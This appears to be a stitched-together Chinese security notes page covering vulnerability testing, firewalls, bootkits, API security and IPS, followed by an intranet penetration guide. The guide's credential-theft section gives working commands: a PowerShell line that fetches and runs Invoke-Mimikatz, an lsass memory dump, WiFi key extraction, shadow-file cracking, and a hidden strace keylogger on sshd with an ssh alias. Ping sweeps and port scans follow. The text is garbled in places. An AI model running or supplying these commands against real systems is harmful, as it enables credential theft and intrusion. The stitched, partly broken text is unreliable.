每一個漏洞都有多個特征，而根據不同的特征可以將漏洞按照不同的方式分類。一般情況下，漏洞信息應包括漏洞名稱、漏洞成因、漏洞級別、漏洞影響、受影響的系統、漏洞解決方案、漏洞利用類型和漏洞利用方法等。

1.二進制比對技術

二進制比對技術又可稱為補丁比對技術，它主要是被用以挖掘已經發現的漏洞，因此在一定意義上也可被認為是一種漏洞分析技術。由于安全公告中一般都不指明漏洞的確切位置和成因，使得漏洞的有效利用比較困難。但漏洞一般都有相應的補丁，所以可以通過比較補丁前后的二進制文件，確定漏洞的位置和成因。補丁比較主要包括源碼補丁比較和二進制補丁比較兩種。

2.測試技術

白盒測試

白盒測試是基于源碼的測試技術，直接面對程序中的數據和算法，進行控制流分析和數據流分析。在此需要說明的是，很多漏洞都是數據和算法共同造成的，并非單是數據或者算法的原因。控制流分析一般要得出程序的控制流圖，就是程序的調用、跳轉結構，是程序從入口到出口的路徑圖。數據流分析一般是跟蹤數據的產生、傳輸、處理和存儲等。在安全性測試的應用中，這兩種分析方法應該結合。下面以針對數組越界的測試進行分析。

黑盒測試

在軟件的設計和開發過程中，無論是設計者還是開發者都會作一個隱含假設，即軟件存在輸入域，用戶的輸入會限定在該輸入域中。然而在軟件的實際應用中，沒有可以將用戶的輸入限制在一定范圍內的機制，特別是一些惡意用戶，他們會通過各種方法尋找輸入域之外值，以期發現軟件的漏洞。黑盒測試就是利用各種輸入對程序進行探測，并對運行程序進行分析，以期發現系統漏洞的測試技術。這種測試技術僅僅需要運行的程序而不需要分析任何源代碼，測試者對軟件內部一無所知，但是清楚地知道軟件能做什么，能夠對程序基于輸入和輸出的關聯性進行分析。
黑盒測試最關鍵的問題是測試數據的選取。既然知道軟件能做什么，那么也就大概知道該軟件的安全輸入域的范圍。所以測試最好是選擇軟件安全輸入域之外的數據。當然這還是不夠的，測試人員必須有知識和經驗的積累，例如，溢出漏洞在漏洞總量中占了很大比例，并且這類漏洞多是由特殊字符或者超長字符串導致的，如果分析總結以往溢出漏洞的利用方法，研究這些超長字符或者特殊字符串的構造方式，同樣有利于測試數據的選取。

灰盒測試

灰盒測試綜合了白盒測試和黑盒測試的優點。灰盒測試表現為與黑盒測試相似的形式，然而測試者具有程序的先驗知識，它對于程序的結構和數據流都有一定的認識。這種測試可以直接針對數據流中感興趣的邊界情況進行測試，從而比黑盒測試更高效。典型的灰盒測試有二進制分析，二進制分析往往首先通過逆向過程（ReversEngineering，RE ）來獲得程序的先驗知識，然后通過反編譯器、反匯編器等輔助工具確定有可能出現漏洞的行，反向追蹤以確定是否有利用的可能性。常用的反匯編器有IDA Pro，反編譯器有Boomerang，調試器有OllyDbg、WinDbg等。灰盒測試具有比黑盒測試更好的覆蓋性，然而逆向工程非常復雜， 要求熟悉匯編語言、可執行文件格式、編譯器操作、操作系統內部原理以及其他各種各樣的底層技巧。

防火墻會話信息有以下這些：

• 協議：指明會話的協議；

• VPN：在虛擬防火墻中使用；

• ID：標志唯一的會話；

• ZONE（區域）：指明流量的區域走向；

• TTL：會話的老化時間；

• Left：會話剩余時間；

• output-interface：出接口；

• nextHop:下一跳；

• MAC：mac地址。

Bootkit是更高級的Rootkit，Bootkit特點：

• 在Ring3下可完成Hook，改寫NTLDR；

• 注入內核的代碼沒有內存大小限制，也無需自己讀入代碼；

• BOOTDRIVER驅動初始化時加載，依情況而定，也可hook內核其它地方；

• 理論上可以Hook各種版本ntldr；

• 理論上可以引導各個版本NT內核和內存相關boot.ini參數。

Bootkit和Rootkit的區別：

• Bootkit是通過感染MB磁盤主引記錄的方式對計算機進行攻擊，而Rootkit則是對內存進行攻擊；

• Rootkit是捆綁在其他軟件上以隱藏自己的文件和信息來進行攻擊，而bookit則不需要進行軟件捆綁；

• Rootkit需要被攻擊設備正常啟動后才可以實施攻擊，Bootkit則會在被攻擊設備系統加載前進行攻擊；

• Bootkit注入內核的代碼沒有內存大小限制也不需要自己讀代碼，Rootkit不行；

• Bootkit理論上可以引導各個版本的內核和內存參數，Rootkit不行。

API接口的橫向安全設計原則包括以下這些：

• 身份認證原則：身份認證的目的是為了知道誰在與API服務進行通信，是否是API服務允許的客戶端請求。在普通的Web應用程序中，通常會提供注冊、登錄的功能，沒有注冊、登錄的用戶無法訪問某些系統功能。對于API服務來說，也是一樣的道理。很多場景下的API服務，是需要知道誰在請求，是否允許請求，以保障API接口調用的安全性。

• 授權原則：授權通常發生在身份認證之后，身份認證是解決“你是誰”的問題，即對服務來說，誰在請求我。而授權解決的是“你能訪問什么”的問題，即通過了身份認證之后，訪問者被授予可以訪問哪些API。某些API只有特定的角色才可以訪問，比如只有內網的IP才可以調用某些服務、只有管理員用戶才可以調用刪除用戶的API。賦予某個客戶端調用權限的過程，通常為授權操作的過程。

• 訪問控制原則：訪問控制通常發生在授權之后，很多情況下，對于某個角色的權限設置正確，但訪問控制做的不一定正確，這也是存在很多越權操作的原因。訪問控制是對授權后的客戶端訪問時的正確性驗證。讀者可以設想一下，一個普通的Web應用系統，用戶通常關聯角色，角色再對應關聯菜單，授權就是用戶→角色→菜單這三個實體對象間建立相互關系的過程。如果這個相互關系設置正確，用戶是不具備訪問這個功能菜單的權限的，但如果用戶訪問這個功能菜單時，因訪問控制沒有限制，仍可以訪問，這就是訪問控制的缺陷。對應于API服務，也是如此，不具備訪問權限的API卻可以直接調用，問題就出在訪問控制上。

• 可審計性原則：可審計性是所有應用程序很重要的一個特性，只是很多情況下，系統管理人員過多的關注于功能實現而忽略了可審計的功能。審計的目的對于API來說，主要是為了記錄接口調用的關鍵信息，以便通過審計手段及時發現問題，并在發生問題時通過審計日志進行溯源，找出問題的發生點。不具備可審計性的API當接口發生問題時將是兩眼一抹黑，望API興嘆。

• 資產保護原則：API安全中的資產保護主要是指對API接口自身的保護，比如限速、限流，防止惡意調用，除此之外，API接口傳輸的數據也是需要保護的一個重點內容。在現代的API服務中，接口間相互傳遞的數據存在很多敏感信息，比如個人信息相關的手機號碼、身份證號，業務相關的銀行賬號、資金、密碼等。這些信息資產，在API安全中是特別需要保護的內容，這也是安全設計人員在API安全設計中需要考慮的一個方面。

密碼分為核心密碼、普通密碼和商用密碼：

1. 核心密碼：核心密碼是一個組合詞匯，通過倒裝對后面的“密碼”進行修飾和強調。可以理解為非常重要的密碼。目前使用不常見。其普及源于核心密碼軟件科技公司的產品“核心密碼”；

2. 普通密碼：普通密碼屬于國家秘密。密碼管理部門依照本法和有關法律、行政法規、國家有關規定對核心密碼、普通密碼實行嚴格統一管理。

3. 商用密碼：商用密碼是指對不涉及國家秘密內容的信息進行加密保護或者安全認證所使用的密碼技術和密碼產品。商用密碼技術是商用密碼的核心，是信息化時代社會團體、組織、企事業單位和個人用于保護自身權益的重要工具。國家將商用密碼技術列入國家秘密，任何單位和個人都有責任和義務保護商用密碼技術的秘密。

utm防火墻具有以下這些安全防護功能：

• 反垃圾郵件；

• 針對Web與電子郵件的反惡意軟件；

• 防病毒網關所有功能；

• 用戶身份認證；

• 流量整形；

• 應用程序控制；

• 防火墻所有功能；

• 入侵防御；

• 虛擬私有網絡(VPN)；

• Web內容過濾；

應對企業內網安全挑戰的10種策略：

• 注意內網安全與網絡邊界安全的不同

內網安全的威脅不同于網絡邊界的威脅。網絡邊界安全技術防范來自Internet上的攻擊，主要是防范來自公共的網絡服務器如HTTP或SMTP的攻擊。網絡邊界防范（如邊界防火墻系統等）減小了資深黑客僅僅只需接入互聯網、寫程序就可訪問企業網的幾率。內網安全威脅主要源于企業內部。惡性的黑客攻擊事件一般都會先控制局域網絡內部的一臺Server，然后以此為基地，對Internet上其他主機發起惡性攻擊。因此，應在邊界展開黑客防護措施，同時建立并加強內網防范策略。

• 限制VPN的訪問

虛擬專用網（VPN）用戶的訪問對內網的安全造成了巨大的威脅。因為它們將弱化的桌面操作系統置于企業防火墻的防護之外。很明顯VPN用戶是可以訪問企業內網的。因此要避免給每一位VPN用戶訪問內網的全部權限。這樣可以利用登錄控制權限列表來限制VPN用戶的登錄權限的級別，即只需賦予他們所需要的訪問權限級別即可，如訪問郵件服務器或其他可選擇的網絡資源的權限。

• 為合作企業網建立內網型的邊界防護

合作企業網也是造成內網安全問題的一大原因。例如安全管理員雖然知道怎樣利用實際技術來完固防火墻，保護MS-SQL，但是Slammer蠕蟲仍能侵入內網，這就是因為企業給了他們的合作伙伴進入內部資源的訪問權限。由此，既然不能控制合作者的網絡安全策略和活動，那么就應該為每一個合作企業創建一個DMZ，并將他們所需要訪問的資源放置在相應的DMZ中，不允許他們對內網其他資源的訪問。

• 自動跟蹤的安全策略

智能的自動執行實時跟蹤的安全策略是有效地實現網絡安全實踐的關鍵。它帶來了商業活動中一大改革，極大的超過了手動安全策略的功效。商業活動的現狀需要企業利用一種自動檢測方法來探測商業活動中的各種變更，因此，安全策略也必須與相適應。例如實時跟蹤企業員工的雇傭和解雇、實時跟蹤網絡利用情況并記錄與該計算機對話的文件服務器。總之，要做到確保每天的所有的活動都遵循安全策略。

• 關掉無用的網絡服務器

大型企業網可能同時支持四到五個服務器傳送e－mail，有的企業網還會出現幾十個其他服務器監視SMTP端口的情況。這些主機中很可能有潛在的郵件服務器的攻擊點。因此要逐個中斷網絡服務器來進行審查。若一個程序（或程序中的邏輯單元）作為一個window文件服務器在運行但是又不具有文件服務器作用的，關掉該文件的共享協議。

• 首先保護重要資源

若一個內網上連了千萬臺（例如30000臺）機子，那么要期望保持每一臺主機都處于鎖定狀態和補丁狀態是非常不現實的。大型企業網的安全考慮一般都有擇優問題。這樣，首先要對服務器做效益分析評估，然后對內網的每一臺網絡服務器進行檢查、分類、修補和強化工作。必定找出重要的網絡服務器（例如實時跟蹤客戶的服務器）并對他們進行限制管理。這樣就能迅速準確地確定企業最重要的資產，并做好在內網的定位和權限限制工作。

• 建立可靠的無線訪問

審查網絡，為實現無線訪問建立基礎。排除無意義的無線訪問點，確保無線網絡訪問的強制性和可利用性，并提供安全的無線訪問接口。將訪問點置于邊界防火墻之外，并允許用戶通過VPN技術進行訪問。

• 建立安全過客訪問

對于過客不必給予其公開訪問內網的權限。許多安全技術人員執行的“內部無Internet訪問”的策略，使得員工給客戶一些非法的訪問權限，導致了內網實時跟蹤的困難。因此，須在邊界防火墻之外建立過客訪問網絡塊。

• 創建虛擬邊界防護

主機是被攻擊的主要對象。與其努力使所有主機不遭攻擊（這是不可能的），還不如在如何使攻擊者無法通過受攻擊的主機來攻擊內網方面努力。于是必須解決企業網絡的使用和在企業經營范圍建立虛擬邊界防護這個問題。這樣，如果一個市場用戶的客戶機被侵入了，攻擊者也不會由此而進入到公司的R&D。因此要實現公司R&D與市場之間的訪問權限控制。大家都知道怎樣建立互聯網與內網之間的邊界防火墻防護，現在也應該意識到建立網上不同商業用戶群之間的邊界防護。

• 可靠的安全決策

網絡用戶也存在著安全隱患。有的用戶或許對網絡安全知識非常欠缺，例如不知道RADIUS和TACACS之間的不同，或不知道代理網關和分組過濾防火墻之間的不同等等，但是他們作為公司的合作者，也是網絡的使用者。因此企業網就要讓這些用戶也容易使用，這樣才能引導他們自動的響應網絡安全策略。

另外，在技術上，采用安全交換機、重要數據的備份、使用代理網關、確保操作系統的安全、使用主機防護系統和入侵檢測系統等等措施也不可缺少。

入侵防御系統是一部能夠監視網絡或網絡設備的網絡資料傳輸行為的計算機網絡安全設備，能夠即時的中斷、調整或隔離一些不正常或是具有傷害性的網絡資料傳輸行為。可以分為基于特征的IPS、基于異常的IPS、基于策略的IPS、基于協議分析的IPS。

• 基于特征的IPS是許多IPS解決方案中最常用的方法。把特征添加到設備中，可識別當前最常見的攻擊。也被稱為模式匹配IPS。特征庫可以添加、調整和更新，以應對新的攻擊。

• 基于異常的IPS也被稱為基于行規的IPS。基于異常的方法可以用統計異常檢測和非統計異常檢測。

• 基于策略的IPS更關心的是是否執行組織的安保策略。如果檢測的活動違反了組織的安保策略就觸發報警。使用這種方法的IPS，要把安全策略寫入設備之中。

• 基于協議分析的IPS與基于特征的方法類似。大多數情況檢查常見的特征，但基于協議分析的方法可以做更深入的數據包檢查，能更靈活地發現某些類型的攻擊。

云計算的關鍵特征有以下這些：

• 按需自服務：用戶能以自助方式部署資源，如配置服務時間和網絡存儲容量，此過程通常不需要與服務提供商進行人工交互。

• 廣泛的網絡接入：云計算通過網絡提供服務能力，應支持各種標準設備接口，包括各種瘦客戶端和胖客戶端（如移動電話、筆記本式計算機或PDA）。

• 資源池化：云計算提供商的資源被池化，以便以多用戶租用模式被所有用戶使用，并根據用戶的需求對不同的物理資源和虛擬資源動態分配和再分配。用戶一般不知道資源的確切位置，也不能控制資源的分配，但可以指定其上一層的大概位置（如國家、省或數據中心）。這些資源包括存儲、處理、內存、帶寬和虛擬機等。

• 快速彈性：云計算具有快速可彈性的分配能力，以便快速自動擴展和快速釋放資源實現收縮。對用戶而言，可以獲取的資源看起來似乎是無限的，并且可在任何時間購買任意數量的資源。

• 按量計費：云系統通過一種計量功能來自動調控和優化資源利用，根據不同的服務類型按照合適的度量指標進行計量（如存儲、處理、帶寬和活躍用戶賬戶）。資源使用情況可被監控、控制和報告，以便對服務提供者和用戶透明。

網絡緩沖區溢出攻擊的防范手段有以下這些：

• 正確的編寫代碼：編寫時重復地檢查代碼的漏洞可以使程序更加完美和安全。通常借助一些工具來幫助程序員編寫安全正確的程序，避免源代碼中對容易產生漏洞的函數庫的調用，如對strcpy和sprintf的調用，這兩個函數都沒有檢查輸入參數的長度。或者避免使用查錯工具，如fault injection等，通過人為隨機地產生一些緩沖區溢出來尋找代碼的安全漏洞。

• 非執行的緩沖區：使緩沖區不可執行從而阻止攻擊者植入攻擊代碼。但系統為了實現更好的性能和功能，往往在數據段中動態地放入可執行的代碼。所以為了保持程序的兼容性不可能使得所有程序的數據段都不可執行。可以設定堆棧數據段不可執行，這樣最大限度地保證了程序的兼容性。

• 檢查數組邊界：利用編譯器的邊界檢查來實現緩沖區的保護，保證數組不溢出。為了實現數組邊界檢查，對數組的所有的讀寫操作都應當被檢查以確保對數組的操作在正確的范圍內。

• 程序指針完整性檢查：程序指針完整性檢查是在程序指針被引用之前檢測到它的改變，即使有人改變了程序的指針，也會因為系統早先已經檢測到了指針的改變而不會造成對指針的非法利用。

• 使堆棧向高地址方向增長。使用的機器堆棧壓入數據時向高地址方向前進，那么無論緩沖區如何溢出，都不可能覆蓋低地址處的函數返回地址指針，也就避免了緩沖區溢出攻擊。但是這種方法仍然無法防范利用堆和靜態數據段的緩沖區進行溢出的攻擊。

Union注入，Boolean注入，報錯注入攻擊，時間注入攻擊

瑞星防火墻系統有以下這些：

1. 瑞星ESM（下一代網絡版）

2. 瑞星ESM防病毒系統（信創版）

3. 瑞星殺毒軟件網絡版

4. 瑞星安全云終端軟件

5. 瑞星ESM 365

路由選擇算法的主要參數如下：

• 跳數：跳數是指從源主機到目的主機的路徑上，轉發分組的路由器數量。一般來說，跳數越少的路徑越好。

• 帶寬：帶寬指鏈路的傳輸速率，例如T1鏈路的傳輸速率為1.544Mbps，也可以說T1鏈路的帶寬為1.544Mbps。

• 延時：延時是指一個分組從源主機到達目的主機花費的時間。

• 負載：負載是指通過路由器或線路的單位時間通信量。

• 可靠性：可靠性是指傳輸過程中的分組丟失率。

• 開銷：開銷通常與使用的鏈路類型、長度、數據速率、鏈路容量、安全等因素相關。

本機信息收集：1.查詢賬戶信息2.查詢網絡和端口信息3.查詢進程列表4.查詢系統和補丁信息5.憑證收集。域內信息收集：1.判斷是否有域2.查找域管理員3.找到域控。登錄憑證竊取：Windows下登錄憑證竊取；Linux下登錄憑證竊取技巧。存活主機探測。內網端口掃描。

滲透測試的本質是信息收集，我們可以將內網信息收集大致分為5個步驟，即本機信息收集、域內信息收集、登錄憑證竊取、存活主機探測、內網端口掃描。

本機信息收集

1.查詢賬戶信息：

對當前主機的用戶角色和用戶權限做了解，判斷是否需要進一步提升權限。

win：whoami、net user 用戶名
linux：whoami、id、cat /etc/shadow、cat /etc/passwd

2.查詢網絡和端口信息

根據目的主機的IP地址/網絡連接/相關網絡地址，確認所連接的網絡情況。

win：ipconfig、netstat -ano
        ARP表：arp -a 
        路由表: route print
        查看dns緩存記錄命令：ipconfig/displaydns
linux：ifconfig、netstat -anplt
        ARP表:arp -a / 路由表:route -n
        查看登錄日志獲取登錄來源ip

3.查詢進程列表

查看本地運行的所有進程，確認本地軟件運行情況，重點可以關注安全軟件。

win：tasklist 
linux: ps、 top

4.查詢系統和補丁信息

獲取當前主機的系統版本和補丁更新情況，可用來輔助提升權限。

win：systeminfo，查詢系統信息/補丁安裝情況。
     wmic qfe get Caption,description,HotfixID,installedOn   //查詢補丁信息，包含說明鏈接/補丁描述/KB編號/更新時間等信息
     wmic qfe list full  查詢全部信息
Linux: 通過查看內核版本 uname -a 或者使用rpm -qa來查詢安裝了哪些軟件包

5.憑證收集

服務器端存有敏感信息，通過收集各種登錄憑證以便擴大戰果。

Windows： 本地密碼Hash和明文密碼/抓取瀏覽器密碼/服務端明文密碼
linux：history記錄敏感操作/shadow文件破解/mimipenguin抓取密碼/使用Strace收集登錄憑證/全盤搜索敏感信息

域內信息收集

搜集完本機相關信息后，就需要判斷當前主機是否在域內，如果在域內，就需要進一步收集域內信息

1.判斷是否有域

一般域服務器都會同時作為時間服務器，所以使用下面命令判斷主域

運行 net time /domain 該命令后，一般會有如下三種情況:
1.存在域，但當前用戶不是域用戶，提示說明權限不夠
  C:\Users>bypass>net time /domain
  發生系統錯誤 5 
  拒絕訪問。
2.存在域，并且當前用戶是域用戶
   C:\Users\Administrator>net time /domain
   \\dc.test.com 的當前時間是 2020/10/23 21:18:37
   命令成功完成。
3.當前網絡環境為工作組，不存在域
   C:\Users\Administrator>net time /domain
   找不到域 WORKGROUP 的域控制器。

2.查找域管理員

net user /domain //獲取域用戶列表
net group /domain  //查詢域內所有用戶組列表
net group “Domain Admins” /domain //查詢域管理員用戶
net group "Domain Controllers" /domain  //查看域控制器
net localgroup administrators /domain  //查詢域內置本地管理員組用戶

3.找到域控

nslookup/ping 域名,解析到域控服務器IP地址

登錄憑證竊取

Windows下登錄憑證竊取

1、Windows 本地密碼Hash

Windows的系統密碼hash默認情況下一般由兩部分組成：第一部分是LM-hash，第二部分是NTLM-hash。Windows系統下hash密碼格式用戶名稱

例如：

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
用戶名稱為：Administrator
RID為：500
LM-HASH值為：AF01DF70036EBACFAAD3B435B51404EE
NT-HASH值為：44F077E27F6FEF69E7BD834C7242B040

破解方式一：hash在線破解網站:

https://www.objectif-securite.ch/ophcrack
http://cmd5.com

mimikatz使用起來也非常簡單，提取Windows系統的明文密碼只需兩行命令：

privilege::debug

破解方式三：wce

wce的常用參數使用說明如下：
參數解釋:
    -l     列出登錄的會話和NTLM憑據（默認值）
    -s     修改當前登錄會話的NTLM憑據 參數：<用戶名>:<域名>:<LM哈希>:<NT哈希>
    -w     通過摘要式認證緩存一個明文的密碼

破解方式四：Powershell+mimikatz

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

破解方式五：prodump+mimikatz

procdump是微軟官方提供的一個小工具

微軟官方下載地址：<https://technet.microsoft.com/en-us/sysinternals/dd996900>

# 將工具拷貝到目標機器上執行如下命令（需要管理員權限,我選擇的版本是64位）
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 將生成的內存dump文件拷貝到mimikatz同目錄下，雙擊打開mimikatz執行情況如圖：
mimikatz # sekurlsa::minidump lsass.dmp
# Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

2、抓取瀏覽器密碼

很多瀏覽器都提供了記住密碼的功能，用戶在登錄一些網站的時候會選擇記住密碼。

LaZagne：提取瀏覽器所保存的密碼

github項目地址：https://github.com/AlessandroZ/LaZagne

3、服務端明文密碼

在一些配置文件或日志里，明文記錄著敏感的密碼信息，如web.config、config.ini等文件，可通過手動翻查敏感目錄，也可以通過findstr命令來查找敏感文件和內容。

findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml

4、第三方運維工具托管密碼

常見的有Linux運維工具，如Putty、xshell、winscp等，RDP管理工具，Remote Desktop Organizer，遠控軟件：Teamviewer、向日葵、VNC等。
xshell 密碼解密工具：https://github.com/dzxs/Xdecrypt
提取WinSCP，PuTTY等保存的會話信息：https://github.com/Arvanaghi/SessionGopher
從內存中提權TeamViewer密碼的工具：https://github.com/attackercan/teamviewer-dumper

5、查看電腦wifi密碼

# 查看電腦連接過的所有wifi
netsh wlan show profiles
# 查看wifi信號為Aaron的密碼
netsh wlan show profiles name="Aaron" key=clear
# CMD一鍵獲取 所有連接過的WIFI密碼
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

Linux下登錄憑證竊取技巧

01、history記錄敏感操作

Linux系統會自動把用戶的操作命令記錄到歷史列表中，當用戶在命令行中輸入賬號、密碼進行登錄時，將會導致敏感信息泄露。

02、shadow文件破解

shadow用于存儲 Linux 系統中用戶的密碼信息，以一個用例來說明：

root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0:99999

wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
make clean linux-x86-64
 ./john /etc/shadow

https://github.com/huntergregal/mimipenguin

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

# 查找用戶名和密碼
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log
# 結果形式如下
[pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9

# 添加命令別名
vi ~/.bashrc或者/etc/bashrc
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
# 使命令別名立即生效
source ~/.bashrc

grep -A 9 'password' .ssh-25Sep091601017212.log

tcpdump -i ens33 port 23 -w test.cap

grep -rn "password=" /

https://github.com/sevagas/swap_digger

https://github.com/ph4ntonn/Impost3r

for /l %i in (1,1,255) do @ping 192.168.64.%i -w 1 -n 1|find /i "ttl="

for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255"

PS C:\Users\Bypass> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.246.44",$_)) "Port $_ is open!"} 2>$null

foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}

auxiliary/scanner/discovery/arp_sweep   ARP掃描
auxiliary/scanner/discovery/udp_sweep   UDP掃描
auxiliary/scanner/netbios/nbname        NETBIOS掃描
auxiliary/scanner/snmp/snmp_enum        SNMP掃描
auxiliary/scanner/smb/smb_version       SMB掃描

auxiliary/scanner/portscan/ack          TCP ACK端口掃描
auxiliary/scanner/portscan/ftpbounce    FTP bounce端口掃描
 auxiliary/scanner/portscan/syn         SYN端口掃描
auxiliary/scanner/portscan/tcp          TCP端口掃描  
auxiliary/scanner/portscan/xmas         TCP XMas端口掃描

-sT: TCP 掃描
-sS: SYN 掃描
-sA: ACK 掃描
-sF：FIN掃描
-sU: UDP 掃描
-sR: RPC 掃描
-sP: ICMP掃描

nmap -sS -p 1-65535 -v 192.168.99.177